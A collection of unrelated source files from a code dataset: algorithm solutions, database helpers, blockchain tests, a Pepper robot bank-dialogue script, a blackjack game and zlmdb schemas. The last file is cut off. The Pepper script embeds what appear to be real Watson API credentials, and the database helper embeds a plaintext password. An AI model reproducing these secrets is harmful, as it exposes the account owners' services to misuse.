{"seq_id":"626847480","text":"\"\"\"\n@Time:2018/2/10 17:56\n@Author:qingliu\n@Source:ECNU Online Judge\n@Problem:3213\n@Website:http://acm.ecnu.edu.cn/problem/3213/\n\"\"\"\n\"\"\"\nN cows have been urgently mobilized and stand in one long line. Seen from left to right, the cow in position i has height Hi. At John's command, every cow looks to the right. Assume each cow can only see cows that are taller than itself. Which is the nearest cow that each of them sees?\n\nInput\n Line 1: a single integer N, 1≤N≤10^6\n\n Lines 2 to N+1: line i+1 contains one integer Hi, 1≤Hi≤10^6\n\nOutput\n Lines 1 to N: line i contains one integer Ci, the number of the nearest cow that cow i sees when looking right; if it cannot see any cow, Ci is 0\nExamples\n input\n 6\n 3\n 2\n 6\n 1\n 1\n 2\n output\n 3\n 3\n 0\n 6\n 6\n 0\n\"\"\"\n# Algorithm idea:\n# use a monotonic stack\nN = int(input())\nH = [0]\nmonoStack = []\nresult = [0] * (N+1)\nfor i in range(N):\n    H.append(int(input()))\nfor i in range(1, N+1):\n    while len(monoStack) > 0 and H[monoStack[-1]] < H[i]:\n        result[monoStack[-1]] = i\n        monoStack.pop()\n    monoStack.append(i)\ndel result[0]\nprint(*result, sep='\\n')\n","sub_path":"2.数据结构/1.栈/3213.向右看齐.py","file_name":"3213.向右看齐.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"30171286","text":"import geopandas as gpd\nimport pandas as pd\nfrom numpy import log\n\ndef Syntax_normalizer(df):\n    \"\"\"\n    This function returns normalised Choice and Integration values based on Space Syntax literature.\n    \n    NaCH = log(CH+1) / log(TD+3)\n    NaIN = NC^1.2 / TD\n    \n    \"\"\"\n    #extracting the useful columns\n    useful_cols = [i[6:] for i in df.columns if (i[:5]==\"T1024\")]\n    \n    #extracting the radii that need to be calculated\n    radii = [int(r.split()[1][1:]) for r in useful_cols if r[:6]==\"Choice\"]\n\n    #creating the column names\n    NaCh_colnames = [\"NaCh_\"+str(r) for r in radii]\n    NaIn_colnames = [\"NaIn_\"+str(r) for r in radii]\n    \n    # empty dictionary to store all calculation with their keys\n    normalized_dct = {}\n    for rad, NaCh_col_name, NaIn_col_name in zip(radii, NaCh_colnames, NaIn_colnames):\n        #slice the dataframe with relevant columns\n        choice = df[\"T1024 Choice R%s metric\" % str(rad)]\n        tdepth = df[\"T1024 Total Depth R%s metric\" % str(rad)]\n        ncount = df[\"T1024 Node Count R%s metric\" % str(rad)]\n\n        NaCh_vals = log(choice+1) / log(tdepth+3)\n        NaIn_vals = ncount**1.2 / tdepth\n\n        normalized_dct[NaCh_col_name] = NaCh_vals\n        normalized_dct[NaIn_col_name] = NaIn_vals\n    \n    #convert dictionary to dataframe \n    newdf = pd.DataFrame(normalized_dct)\n    #join the new dataframe with the input DataFrame 
(based on index)\n    df = df.join(newdf)\n    \n    print(\"The following columns have been added successfully:\\n\",NaCh_colnames,\"\\n\",NaIn_colnames,\"\\n\")\n    return df","sub_path":"Syntax_functions.py","file_name":"Syntax_functions.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"448540720","text":"# Defined as classes.\n\nimport pymysql\n\nclass DB_Utils:\n\n    def queryExecutor(self, db, sql, params):\n        conn = pymysql.connect(host='localhost', user='guest', password='bemyguest', db=db, charset='utf8')\n\n        try:\n            with conn.cursor(pymysql.cursors.DictCursor) as cursor: # dictionary based cursor\n                cursor.execute(sql, params)\n                tuples = cursor.fetchall()\n                return tuples\n        except Exception as e:\n            print(e)\n            print(type(e))\n        finally:\n            conn.close()\n\n    def updateExecutor(self, db, sql, params):\n        conn = pymysql.connect(host='localhost', user='guest', password='bemyguest', db=db, charset='utf8')\n\n        try:\n            with conn.cursor() as cursor:\n                cursor.execute(sql, params)\n                conn.commit()\n        except Exception as e:\n            print(e)\n            print(type(e))\n        finally:\n            conn.close()\n\nclass DB_Queries:\n    # every SELECT statement is defined here, each as its own method\n\n    def selectPlayer(self, position):\n        sql = \"SELECT * FROM player WHERE position = %s\"\n        params = (position, )\n\n        util = DB_Utils()\n        tuples = util.queryExecutor(db=\"kleague\", sql=sql, params=params)\n        return tuples\n\nclass DB_Updates:\n    # every update statement is defined here, each as its own method\n\n    def insertPlayer(self, player_id, player_name, team_id, position):\n        sql = \"INSERT INTO player (player_id, player_name, team_id, position) VALUES (%s, %s, %s, %s)\"\n        params = (player_id, player_name, team_id, position)\n\n        util = DB_Utils()\n        util.updateExecutor(db=\"kleague\", sql=sql, params=params)\n\n#########################################\n\nif __name__ == \"__main__\":   # __name__ is __main__ (True) when DBAPI_5.py is executed directly; when imported it is the module name, i.e. DBAPI_5 (False)\n    query = DB_Queries()\n    players = query.selectPlayer(\"GK\")\n    print(len(players))\n    print(players)\n    print()\n\n    update = DB_Updates()\n    update.insertPlayer(\"2020001\", \"홍길동\", \"K01\", \"GK\")\n\n    players = query.selectPlayer(\"GK\")\n    print(len(players))\n    print(players)\n","sub_path":"Part1/DBAPI_5.py","file_name":"DBAPI_5.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"191556356","text":"from neutro.src.chain import transaction\nfrom neutro.src.chain.transaction import Transaction\nfrom neutro.src.util import cryptoutil\nfrom neutro.src.util import wallet\n\n\ndef test_transaction():\n    \"\"\"base test for transaction\"\"\"\n    sender = \"iWVjc8hWuRuePAv1X8nDZdcjKcqivDUH62YKhBXBHqp2yGfgeXyHJDj5XwCHwjWB6GevCjMYT59XSBiQvMYHQ4P\"\n    receivers = [\"01\", \"02\", \"0a\"]\n    amounts = [1, 2, 3]\n    fee = 100\n    tx = Transaction(sender, receivers, amounts, fee)\n\n    assert tx.string() == \\\n        '{\"sender\": \"iWVjc8hWuRuePAv1X8nDZdcjKcqivDUH62YKhBXBHqp2yGfgeXyHJDj5XwCHwjWB6GevCjMYT59XSBiQvMYHQ4P\", \"receivers\": [\"01\", \"02\", \"0a\"], \"amounts\": [1, 2, 3], \"nonce\": 0, \"fee\": 100, \"signature\": \"\"}'\n    assert tx.hash() == \"a564b3a98ed7d3f66b69ee4d9f7fab588a875ae06c6f7919c7f83121bb72f859\"\n\n\ndef test_unsigned_hash():\n    \"\"\"test the unsigned_hash of tx\"\"\"\n    sender = \"abcd\"\n    receivers = [\"fe\"]\n    amounts = [1]\n    fee = 100\n    tx = Transaction(sender, receivers, amounts, fee)\n    # get hashes\n    tx_signed_hash = tx.hash()\n    tx_unsigned_hash = tx.unsigned_hash()\n    # no signature 
means equivalent hashes\n assert tx_signed_hash == tx_unsigned_hash\n # set signature\n tx.signature = \"abcd\"\n # assert signed hash has changed\n assert tx.hash() != tx_signed_hash\n # assert unsigned hash has not changed\n assert tx.unsigned_hash() == tx_unsigned_hash\n\n\ndef test_tx_from_json():\n \"\"\"test serialization and deserialization\"\"\"\n sender = \"abcd\"\n receivers = [\"fe\"]\n amounts = [1]\n fee = 100\n t1 = Transaction(sender, receivers, amounts, fee)\n t2 = transaction.from_json(t1.string())\n assert t1.string() == t2.string()\n assert t1.hash() == t2.hash()\n assert t1.unsigned_hash() == t2.unsigned_hash()\n\n\ndef test_verify_tx():\n \"\"\"\n tests if a signed transaction can be validated\n we just need the address for this, because address=public_key\n \"\"\"\n w = wallet.generate_new_wallet()\n sender = w.get_address()\n receivers = [\"fe\"]\n amounts = [1]\n fee = 100\n t = Transaction(sender, receivers, amounts, fee)\n w.sign_transaction(t)\n assert cryptoutil.verify_transaction_sig(t, t.get_signature())\n assert t.verify()\n\n\ndef test_unvalid_verify_tx():\n sender = \"a\"\n receivers = [\"fe\"]\n amounts = [1]\n fee = 100\n t = Transaction(sender, receivers, amounts, fee)\n assert False == t.verify()\n","sub_path":"neutro/test/chain/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"505870479","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport time\nimport sys\nimport qi\nfrom requests.exceptions import ConnectionError\nimport json\nimport requests\nimport HTMLParser\nimport random\n\nclass Banque(object):\n def __init__(self):\n\n self.appli = qi.Application(sys.argv)\n self.appli.start()\n self.session = self.appli.session\n\n self.logger = qi.Logger(\"Banque\")\n\n self.ALTabletService = self.session.service(\"ALTabletService\")\n self.tts = self.session.service('ALTextToSpeech')\n self.mem = self.session.service(\"ALMemory\")\n\n self.ALTabletService.resetTablet()\n self.mem.insertData('Banque/onStart', 0)\n\n def speak(self, clientId, toSpeak):\n self.mem.raiseEvent('Banque/tts', toSpeak)\n self.write_logchat('Bot', toSpeak)\n self.tts.say(toSpeak)\n global_var = (item for item in self.global_vars if item[\"clientId\"] == str(clientId)).next()\n global_var['tts'] = toSpeak\n try:\n self.logger.info(\"Robot: \" + toSpeak)\n except UnicodeEncodeError as e:\n self.logger.info(e)\n\n def listen(self, clientId):\n startListening = 1\n self.mem.insertData('Banque/startListening', 1)\n while (startListening==1):\n startListening = self.mem.getData('Banque/startListening')\n time.sleep(0.2)\n pass\n\n stt = self.mem.getData('Banque/stt')\n stt = stt.replace(\" ' \", \"'\")\n self.write_logchat('Human', stt)\n global_var = (item for item in self.global_vars if item[\"clientId\"] == str(clientId)).next()\n global_var['stt'] = stt\n self.logger.info(\"Human: \" + stt)\n self.mem.insertData('Banque/startListening', 1)\n return stt\n\n # def write_logchat(self, actor, text):\n # with open(self.log_filename, 'a') as f:\n # try:\n # text = text.encode('ascii', 'xmlcharrefreplace')\n # f.write(actor + '\\t: ' + text + '\\n')\n # except UnicodeDecodeError as e:\n # self.logger.info(\"Error in write_logchat\")\n # self.logger.error(e)\n\n def write_logchat(self, actor, text):\n try:\n with open(self.log_filename, 'a') as f:\n text = text.encode('ascii', 'xmlcharrefreplace')\n f.write(actor + '\\t: ' + text + 
'\\n')\n f.close()\n time.sleep(0.1)\n except UnicodeDecodeError as e:\n self.logger.info(\"Error in write_logchat\")\n self.logger.error(e)\n\n def quit(self):\n self.ALTabletService.resetTablet()\n self.logger.info('Reset Tablet')\n\n\n\n def callBanqueDialog(self, clientId):\n client_id = \"\"\n conversation_id = \"\"\n question = \"\"\n res = \"\"\n\n while ((res != 'END') and ('Au revoir' not in res)):\n url = 'https://gateway.watsonplatform.net/dialog/api/v1/dialogs/97111df6-fc4d-4714-b409-34f0c483f5f4/conversation?input='\n if ((client_id != \"\") or (conversation_id != \"\")):\n question = self.listen(clientId)\n url = url + question\n url = url + '&client_id=' + str(client_id)\n url = url + '&conversation_id=' + str(conversation_id)\n\n r = requests.post(url, auth=('d2b39394-6660-4948-a9ed-74a70883f784', '4LSJkrIBBupP'))\n client_id = json.loads(r.text)[\"client_id\"]\n conversation_id = json.loads(r.text)[\"conversation_id\"]\n\n if ((question != 'quitter') and (question != 'Quitter')):\n res = \" \".join(json.loads(r.text)[\"response\"])\n else:\n res = 'END'\n # self.logger.info(res)\n if (res != 'END'):\n self.speak(clientId, res)\n\n \"\"\"\n def send2BanqueNodeRed(self, clientId, value):\n host = \"https://banque-orange-node-red.mybluemix.net/pepper\"\n payload = {'text':value, 'id':int(clientId)}\n self.logger.info(\"Value to send to Watson: \" + value + \", id=\"+clientId)\n r = requests.get(host, params=payload)\n self.logger.info(\"Send to Watson OK\")\n\n hparser = HTMLParser.HTMLParser()\n res = hparser.unescape(r.text)\n self.logger.info(\"Receive from Watson OK\")\n if ((value=='Quitter') or (value=='quitter')):\n res = 'END'\n return res\n\n def getBankInfo(self, clientId):\n res = self.send2BanqueNodeRed(clientId, 'hello')\n self.speak(clientId, res)\n while ((res!='END') and ('Au revoir' not in res)):\n question = self.listen(clientId)\n question = question.replace(\" ' \", \"'\")\n self.logger.info('Question: ' + question)\n res = self.send2BanqueNodeRed(clientId, question)\n if ((res!='END') and ('502' not in res)):\n self.speak(clientId, res)\n elif ('502' in res):\n self.speak(clientId, \"Un erreur depuis le serveur du Watson s'est produit...\")\n elif (res=='END'):\n self.speak(clientId, \"Je quitte la banque...\")\n\n try:\n self.logger.info('Response: '+res)\n except UnicodeEncodeError as e:\n self.logger.error(e)\n \"\"\"\n\n \"\"\"\n ==============================================================================\n Main program body with decision and redirection\n ==============================================================================\n \"\"\"\n def runProgram(self, clientId):\n time.sleep(1)\n self.callBanqueDialog(clientId)\n self.quit_program(clientId)\n\n \"\"\"\n Quit program\n \"\"\"\n def quit_program(self, clientId):\n self.mem.raiseEvent('Banque/quit', 1)\n\n \"\"\"\n Initialisation for global variables used by clientId\n \"\"\"\n def global_var_init(self, clientId):\n self.global_vars.append (dict([\n ('clientId', str(clientId)),\n ('tts', ''),\n ('stt', ''),\n ]))\n \"\"\"\n Run\n \"\"\"\n def run(self):\n self.clientId = str(random.randint(1,1000000))\n self.log_filename = 'log_display/chat.log'\n self.global_vars = []\n self.global_var_init(self.clientId)\n\n # Initialisation chat.log for conversation display\n with open(self.log_filename, 'w') as f:\n f.write('')\n f.close()\n self.logger.info(\"Created \" + self.log_filename)\n\n # Wait for onStart (Pepper reaches human for conversation)\n onStart = self.mem.getData('Banque/onStart')\n 
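# initial read; the while loop below then polls ALMemory every 200 ms until another\n        # behavior raises Banque/onStart (Pepper has reached a human to talk to)\n        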
self.logger.info('Banque/onStart: ' + str(onStart))\n while (onStart==0):\n onStart = self.mem.getData('Banque/onStart')\n time.sleep(0.2)\n pass\n\n self.logger.info('Banque/onStart: ' + str(onStart))\n self.runProgram(self.clientId)\n\napp = Banque()\napp.run()\napp.quit()\n\n# End of Program #\n","sub_path":"Banque.py","file_name":"Banque.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"526996272","text":"#!/usr/bin/env python\nimport sys\nfrom nltk.util import clean_html\n\nif (len(sys.argv)) !=3:\n sys.stderr.write('Usage !\\n')\n sys.exit(1)\n\nhtml = ''\n\ninpFile = open(sys.argv[1], 'r');\noutFile = open(sys.argv[2], 'w');\n\nfor line in inpFile.readlines():\n html = html + line\n\noutFile.write(clean_html(html) + '\\n')\n","sub_path":"scripts/nltk_clean.py","file_name":"nltk_clean.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"391014668","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 18 09:50:48 2021\r\n\r\n@author: 07062962468\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport random\r\n\r\ndef load_images(card_images):\r\n suits=['heart', 'club', 'diamond', 'spade']\r\n face_cards = ['jack', 'queen', 'king']\r\n \r\n extension = 'ppm'\r\n \r\n #for each suit, retrieve the image for the card\r\n for suit in suits:\r\n #first the number cards 1 - 10\r\n for card in range(1, 11):\r\n name = 'cards/{}_{}.{}'.format(str(card), suit, extension)\r\n image = tk.PhotoImage(file=name)\r\n card_images.append((card, image,))\r\n \r\n #the face cards\r\n for card in face_cards:\r\n name = 'cards/{}_{}.{}'.format(str(card), suit, extension)\r\n image = tk.PhotoImage(file=name)\r\n card_images.append((10, image,))\r\n\r\ndef deal_card(frame):\r\n #pop the next card off the deck\r\n next_card = deck.pop(0)\r\n deck.append(next_card)\r\n #add the image to a Label and Dislay the label\r\n tk.Label(frame, image=next_card[1], relief='raised' ).pack(side='left')\r\n #now return the card's face value\r\n return next_card\r\n\r\ndef score_hand(hand):\r\n #Calculate the total score of all cards in the list\r\n #Only one ace can have the value 11, and this will reduce to 1 if the hand would burst\r\n score = 0\r\n ace = False\r\n for next_card in hand:\r\n card_value = next_card[0]\r\n if card_value == 1 and not ace:\r\n ace = True\r\n card_value = 11\r\n score += card_value\r\n #if we would bust, check if there is an ace and subtract 10\r\n if score >21 and ace:\r\n score -= 10\r\n ace = False\r\n return score\r\n\r\ndef deal_dealer():\r\n dealer_score = score_hand(dealer_hand)\r\n while 0 < dealer_score < 17:\r\n dealer_hand.append(deal_card(dealer_card_frame))\r\n dealer_score = score_hand(dealer_hand)\r\n dealer_score_label.set(dealer_score)\r\n \r\n player_score = score_hand(player_hand)\r\n if player_score > 21:\r\n result_text.set('Dealer wins!')\r\n elif dealer_score > 21 or dealer_score < player_score:\r\n result_text.set('player wins!')\r\n elif dealer_score > player_score:\r\n result_text.set('Dealer wins!')\r\n else:\r\n result_text.set('Draw!')\r\n \r\n \r\ndef deal_player():\r\n player_hand.append(deal_card(player_card_frame))\r\n player_score = score_hand(player_hand)\r\n dealer_score = score_hand(dealer_hand)\r\n \r\n player_score_label.set(player_score)\r\n if player_score > 21:\r\n result_text.set('Dealer Wins!')\r\n elif dealer_score > 21 or dealer_score < 
player_score:\r\n result_text.set('player wins!')\r\n elif dealer_score > player_score:\r\n result_text.set('Dealer wins!')\r\n else:\r\n result_text.set('Draw!')\r\n\r\ndef restart_game():\r\n global dealer_hand\r\n global player_hand\r\n global dealer_card_frame\r\n global player_card_frame\r\n dealer_card_frame.destroy()\r\n player_card_frame.destroy()\r\n dealer_card_frame = tk.Frame(card_frame, background='green')\r\n dealer_card_frame.grid(row=0, column=1, sticky='ew', rowspan=2)\r\n player_card_frame = tk.Frame(card_frame, background='green')\r\n player_card_frame.grid(row=2, column=1, sticky='ew', rowspan=2)\r\n player_hand.clear()\r\n dealer_hand.clear()\r\n deal_player()\r\n dealer_hand.append(deal_card(dealer_card_frame))\r\n dealer_score_label.set(score_hand(dealer_hand))\r\n deal_player()\r\n random.shuffle(deck)\r\n\r\n \r\ndef end_game():\r\n mainwindow.destroy() \r\n\r\nmainwindow = tk.Tk()\r\nmainwindow.title('Black Jack')\r\nmainwindow.geometry('640x480')\r\nmainwindow.configure(background='green')\r\n\r\nresult_text = tk.StringVar()\r\nresult = tk.Label(mainwindow, textvariable=result_text)\r\nresult.grid(row=0, column=0, columnspan=3)\r\ncard_frame = tk.Frame(mainwindow, relief='sunken', borderwidth=1, background='green')\r\ncard_frame.grid(row=1, column=0, sticky='ew', columnspan=3, rowspan=2)\r\n\r\ndealer_score_label = tk.IntVar()\r\ntk.Label(card_frame, text='Dealer', background='green', fg='white').grid(row=0, column=0)\r\ntk.Label(card_frame, textvariable = dealer_score_label, background='green', fg='white').grid(row=1, column=0)\r\n\r\n#embedded frame to hold the card images\r\ndealer_card_frame = tk.Frame(card_frame, background='green')\r\ndealer_card_frame.grid(row=0, column=1, sticky='ew', rowspan=2)\r\n\r\nplayer_score_label = tk.IntVar()\r\n# player_score = 0\r\n# player_ace = False\r\n\r\ntk.Label(card_frame, text='Player', background='green', fg='white').grid(row=2, column=0)\r\ntk.Label(card_frame, textvariable=player_score_label, background='green', fg='white').grid(row=3, column=0)\r\n\r\n#embedded frame to hold the card images\r\nplayer_card_frame = tk.Frame(card_frame, background='green')\r\nplayer_card_frame.grid(row=2, column=1, sticky='ew', rowspan=2)\r\n\r\nbutton_frame = tk.Frame(mainwindow)\r\nbutton_frame.grid(row=3, column=0, columnspan=3, sticky='w')\r\n\r\ndealer_button = tk.Button(button_frame, text='Dealer', command=deal_dealer)\r\ndealer_button.grid(row=0, column=0)\r\n\r\nplayer_button = tk.Button(button_frame, text='Player', command=deal_player)\r\nplayer_button.grid(row=0, column=1)\r\n\r\nrestart_button = tk.Button(button_frame, text='Restart', command=restart_game)\r\nrestart_button.grid(row=0, column=2)\r\n\r\nend_button = tk.Button(button_frame, text='End Game', command=end_game)\r\nend_button.grid(row=0, column=3)\r\n\r\ncards = []\r\nload_images(cards)\r\n# print(cards)\r\n#Create a new deck of cards and shuffle them\r\ndeck = list(cards)\r\nrandom.shuffle(deck)\r\n\r\n#create list to stor dealer's and player's hands\r\ndealer_hand = []\r\nplayer_hand = []\r\n\r\ndeal_player()\r\ndealer_hand.append(deal_card(dealer_card_frame))\r\ndealer_score_label.set(score_hand(dealer_hand))\r\ndeal_player()\r\n\r\nmainwindow.mainloop()\r\n","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"6060844","text":"import pandas as pd\n\ndef getSamePeaks(df, keycolumn):\n grouped = df.groupby(keycolumn)\n 
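# a key that maps to more than one row is a duplicated peak; collect each such\n    # group as its own DataFrame\n    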
samePeakDfs = []\n for k,v in grouped.groups.iteritems():\n if len(v) > 1:\n samePeakDfs.append(grouped.get_group(k))\n return samePeakDfs\n\n","sub_path":"pymetrik.py","file_name":"pymetrik.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525127750","text":"###############################################################################\n#\n# The MIT License (MIT)\n#\n# Copyright (c) typedef int GmbH\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n###############################################################################\n\nimport random\nimport uuid\nimport datetime\nfrom typing import Optional, List, Dict\n\nimport zlmdb\n\n\nclass User(object):\n oid: int\n name: str\n authid: str\n uuid: uuid.UUID\n email: str\n birthday: datetime.date\n is_friendly: bool\n tags: Optional[List[str]]\n ratings: Dict[str, float]\n friends: List[int]\n referred_by: int\n realm_oid: int\n icecream: str\n mrealm: uuid.UUID # type:ignore\n mrealm_notnull: uuid.UUID # type:ignore\n\n def __init__(self):\n self.oid = None\n self.name = None\n self.authid = None\n self.uuid = None\n self.email = None\n self.birthday = None\n self.is_friendly = None\n self.tags = None\n self.ratings = {}\n self.friends = []\n self.referred_by = None\n self.realm_oid = None\n self.icecream = None\n self.mrealm = None\n self.mrealm_notnull = None\n\n def __eq__(self, other):\n if not isinstance(other, self.__class__):\n return False\n if other.oid != self.oid:\n return False\n if other.name != self.name:\n return False\n if other.authid != self.authid:\n return False\n if other.uuid != self.uuid:\n return False\n if other.email != self.email:\n return False\n if other.birthday != self.birthday:\n return False\n if other.is_friendly != self.is_friendly:\n return False\n if (self.tags and not other.tags) or (not self.tags and other.tags):\n return False\n if other.realm_oid != self.realm_oid:\n return False\n if other.icecream != self.icecream:\n return False\n if other.mrealm != self.mrealm:\n return False\n if other.mrealm_notnull != self.mrealm_notnull:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def marshal(self):\n obj = {\n 'oid': self.oid,\n 'name': self.name,\n 'authid': self.authid,\n 'uuid': self.uuid.hex if self.uuid else None,\n 'email': self.email,\n 'birthday': {\n 'year': self.birthday.year if self.birthday else None,\n 'month': self.birthday.month if 
self.birthday else None,\n 'day': self.birthday.day if self.birthday else None,\n },\n 'is_friendly': self.is_friendly,\n 'tags': self.tags,\n 'ratings': self.ratings,\n 'friends': self.friends,\n 'referred_by': self.referred_by,\n 'realm_oid': self.realm_oid,\n 'icecream': self.icecream,\n 'mrealm': self.mrealm.hex if self.mrealm else None,\n 'mrealm_notnull': self.mrealm_notnull.hex if self.mrealm_notnull else None,\n }\n return obj\n\n @staticmethod\n def parse(obj):\n user = User()\n user.oid = obj.get('oid', None)\n user.name = obj.get('name', None)\n user.authid = obj.get('authid', None)\n if 'uuid' in obj:\n user.uuid = uuid.UUID(hex=obj['uuid'])\n user.email = obj.get('email', None)\n if 'birthday' in obj:\n b = obj['birthday']\n user.birthday = datetime.date(b.year, b.month, b.day)\n user.is_friendly = obj.get('is_friendly', None)\n user.tags = obj.get('tags', None)\n user.ratings = obj.get('ratings', {})\n user.friends = obj.get('friends', [])\n user.referred_by = obj.get('referred_by', None)\n user.realm_oid = obj.get('realm_oid', None)\n user.icecream = obj.get('icecream', None)\n if 'mrealm' in obj and obj['mrealm']:\n user.mrealm = uuid.UUID(hex=obj['mrealm'])\n if 'mrealm_notnull' in obj and obj['mrealm_notnull']:\n user.mrealm_notnull = uuid.UUID(hex=obj['mrealm_notnull'])\n return user\n\n @staticmethod\n def create_test_user(oid=None, realm_oid=None):\n user = User()\n if oid is not None:\n user.oid = oid\n else:\n user.oid = random.randint(0, 9007199254740992)\n user.name = 'Test {}'.format(user.oid)\n user.authid = 'test-{}'.format(user.oid)\n user.uuid = uuid.uuid4()\n user.email = '{}@example.com'.format(user.authid)\n user.birthday = datetime.date(1950, 12, 24)\n user.is_friendly = True\n user.tags = ['geek', 'sudoko', 'yellow']\n for j in range(10):\n user.ratings['test-rating-{}'.format(j)] = 1 / (j + 1) # round(random.random(), 3)\n user.friends = [random.randint(0, 9007199254740992) for _ in range(10)]\n user.referred_by = random.randint(0, 9007199254740992)\n if realm_oid is not None:\n user.realm_oid = realm_oid\n else:\n user.realm_oid = random.randint(0, 9007199254740992)\n user.icecream = random.choice(['vanilla', 'lemon', 'strawberry'])\n user.mrealm = uuid.uuid4()\n user.mrealm_notnull = uuid.uuid4()\n return user\n\n\nclass Schema1(zlmdb.Schema):\n\n tab_uuid_str: zlmdb.MapUuidString\n tab_uuid_oid: zlmdb.MapUuidOid\n tab_uuid_uuid: zlmdb.MapUuidUuid\n tab_str_str: zlmdb.MapStringString\n tab_str_oid: zlmdb.MapStringOid\n tab_str_uuid: zlmdb.MapStringUuid\n tab_oid_str: zlmdb.MapOidString\n tab_oid_oid: zlmdb.MapOidOid\n tab_oid_uuid: zlmdb.MapOidUuid\n tab_uuid_json: zlmdb.MapUuidJson\n tab_uuid_cbor: zlmdb.MapUuidCbor\n tab_uuid_pickle: zlmdb.MapUuidPickle\n tab_str_json: zlmdb.MapStringJson\n tab_str_cbor: zlmdb.MapStringCbor\n tab_str_pickle: zlmdb.MapStringPickle\n tab_oid_json: zlmdb.MapOidJson\n tab_oid_cbor: zlmdb.MapOidCbor\n tab_oid_pickle: zlmdb.MapOidPickle\n\n def __init__(self):\n self.tab_uuid_str = zlmdb.MapUuidString(slot=1)\n self.tab_uuid_oid = zlmdb.MapUuidOid(slot=2)\n self.tab_uuid_uuid = zlmdb.MapUuidUuid(slot=3)\n self.tab_str_str = zlmdb.MapStringString(slot=4)\n self.tab_str_oid = zlmdb.MapStringOid(slot=5)\n self.tab_str_uuid = zlmdb.MapStringUuid(slot=6)\n self.tab_oid_str = zlmdb.MapOidString(slot=7)\n self.tab_oid_oid = zlmdb.MapOidOid(slot=8)\n self.tab_oid_uuid = zlmdb.MapOidUuid(slot=9)\n self.tab_uuid_json = zlmdb.MapUuidJson(slot=10, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_uuid_cbor = 
zlmdb.MapUuidCbor(slot=11, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_uuid_pickle = zlmdb.MapUuidPickle(slot=12)\n self.tab_str_json = zlmdb.MapStringJson(slot=20, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_str_cbor = zlmdb.MapStringCbor(slot=21, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_str_pickle = zlmdb.MapStringPickle(slot=22)\n self.tab_oid_json = zlmdb.MapOidJson(slot=30, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_oid_cbor = zlmdb.MapOidCbor(slot=31, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_oid_pickle = zlmdb.MapOidPickle(slot=32)\n\n\nclass Schema2(zlmdb.Schema):\n\n users: zlmdb.MapOidPickle\n\n def __init__(self):\n self.users = zlmdb.MapOidPickle(1)\n\n\nclass Schema3(zlmdb.Schema):\n\n users: zlmdb.MapStringPickle\n\n def __init__(self):\n self.users = zlmdb.MapStringPickle(1)\n\n\nclass Schema4(zlmdb.Schema):\n\n users: zlmdb.MapOidPickle\n\n idx_users_by_authid: zlmdb.MapStringOid\n\n idx_users_by_email: zlmdb.MapStringOid\n\n idx_users_by_realm: zlmdb.MapOidOidOid\n\n idx_users_by_icecream: zlmdb.MapStringOidOid\n\n idx_users_by_mrealm_authid: zlmdb.MapUuidStringOid\n\n idx_users_by_mrealm_authid_notnull: zlmdb.MapUuidStringOid\n\n def __init__(self):\n super(Schema4, self).__init__()\n\n self.users = zlmdb.MapOidPickle(1)\n\n self.idx_users_by_authid = zlmdb.MapStringOid(2)\n self.users.attach_index('idx1', self.idx_users_by_authid, lambda user: user.authid, nullable=False)\n\n self.idx_users_by_email = zlmdb.MapStringOid(3)\n self.users.attach_index('idx2', self.idx_users_by_email, lambda user: user.email, nullable=True)\n\n self.idx_users_by_realm = zlmdb.MapOidOidOid(4)\n self.users.attach_index('idx3',\n self.idx_users_by_realm,\n lambda user: (user.realm_oid, user.oid),\n nullable=False)\n\n self.idx_users_by_icecream = zlmdb.MapStringOidOid(5)\n self.users.attach_index('idx4',\n self.idx_users_by_icecream,\n lambda user: (user.icecream, user.oid),\n nullable=False)\n\n self.idx_users_by_mrealm_authid = zlmdb.MapUuidStringOid(6)\n 